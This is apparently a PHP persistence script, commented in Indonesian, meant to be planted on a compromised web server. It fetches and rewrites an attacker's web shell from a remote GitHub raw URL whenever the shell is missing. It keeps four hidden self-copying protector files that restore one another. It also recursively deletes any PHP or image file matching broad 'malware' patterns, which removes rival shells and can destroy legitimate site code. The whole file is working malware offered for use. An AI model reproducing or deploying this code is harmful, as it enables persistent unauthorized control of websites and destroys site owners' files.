<?php
// =============================================
// PROTECTOR GANAS - VERSI UPGRADE
// 4 file saling jaga + auto restore shell
// =============================================

$shell_name = 'version.php';   // GANTI ini jadi nama shell lo (contoh: .aw.php)
$shell_url  = 'https://raw.githubusercontent.com/semangat777/landing/refs/heads/main/aw.txt';

$protectors = [
    '.syscache.php',
    '.update.php',
    '.controller.php',
    '.configcache.php'
];

// Pola malware (tetap ganas)
$malware_patterns = [
    'eval\s*\(\s*(base64_decode|str_rot13|gzinflate)',
    'base64_decode|str_rot13|gzinflate|assert',
    'shell_exec|system|exec|passthru',
    'O:\d+:"[A-Za-z0-9_\\]+":\d+:{',
    'GIF89a.*<\?php|<\?php.*GIF89a',
];

$docroot = $_SERVER['DOCUMENT_ROOT'];

// 1. Restore shell lo
$shell_path = $docroot . '/' . $shell_name;
if (!file_exists($shell_path) || filesize($shell_path) < 10000) {
    $code = @file_get_contents($shell_url);
    if ($code) {
        file_put_contents($shell_path, $code);
        @chmod($shell_path, 0644);
    }
}

// 2. Saling restore antar 4 protector
foreach ($protectors as $p) {
    $path = $docroot . '/' . $p;
    if (!file_exists($path)) {
        // Copy dari file pertama yang ada
        foreach ($protectors as $source) {
            $src_path = $docroot . '/' . $source;
            if (file_exists($src_path)) {
                copy($src_path, $path);
                @chmod($path, 0644);
                break;
            }
        }
    }
}

// 3. Anti-malware delete langsung
function kill_malware($dir) {
    global $malware_patterns;
    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir));
    $deleted = 0;
    foreach ($iterator as $file) {
        if ($file->isFile()) {
            $path = $file->getPathname();
            $ext = strtolower($file->getExtension());
            if (!in_array($ext, ['php','phtml','php5','inc','gif','jpg'])) continue;

            $content = @file_get_contents($path);
            foreach ($malware_patterns as $pat) {
                if (preg_match('#' . $pat . '#i', $content)) {
                    @unlink($path);
                    $deleted++;
                    break;
                }
            }
        }
    }
    return $deleted;
}

$malware_killed = kill_malware($docroot);

echo "<!-- PROTECTOR GANAS AKTIF - 4 layer saling jaga -->\n";
if ($malware_killed > 0) {
    echo "<pre>✅ $malware_killed malware attacker dihapus!</pre>";
}
?>
